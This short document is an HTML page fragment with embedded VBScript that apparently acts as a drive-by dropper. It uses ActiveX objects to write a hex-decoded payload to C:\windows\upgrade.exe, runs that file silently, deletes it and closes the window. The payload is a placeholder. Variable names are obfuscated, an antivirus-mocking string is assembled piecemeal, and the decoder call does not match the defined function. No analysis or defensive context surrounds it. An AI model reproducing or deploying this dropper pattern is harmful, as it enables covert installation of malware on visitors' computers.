<OBJECT id="MSmedia" classid="clsid:0D435E01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F932DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<SCRIPT language="VBScript">
V=V+(D("!!!!!!!!!!!!!!!!!!HEX!!!!!!!!!!!!!!!!!!"))
Fafa="Ka"+"sp"+"er"+"L"+"O"+"H"
VsfCOx88 = "C:\windows\upgrade.exe"
Jlwa2="Ka"+"sp"+"er"+"L"+"O"+"H"
Set IESetup = MSmedia.CreateTextFile(VsfCOx88, True)
IESetup.Write (V)
IESetup.Close()
MSplay.Run (VsfCOx88), 1, True
MSmedia.DeleteFile (VsfCOx88)
self.Close
MSplay.Run (VsfCOx88), 1, True
MSmedia.DeleteFile (VsfCOx88)
Function X(X1)
Dim X2
Dim X3: X2 = ""
For X3 = 1 To Len(X1) Step 2
X2=X2&Chr("&h"&Mid(X1,X3,2))
Next
X = X2
End Function
</SCRIPT>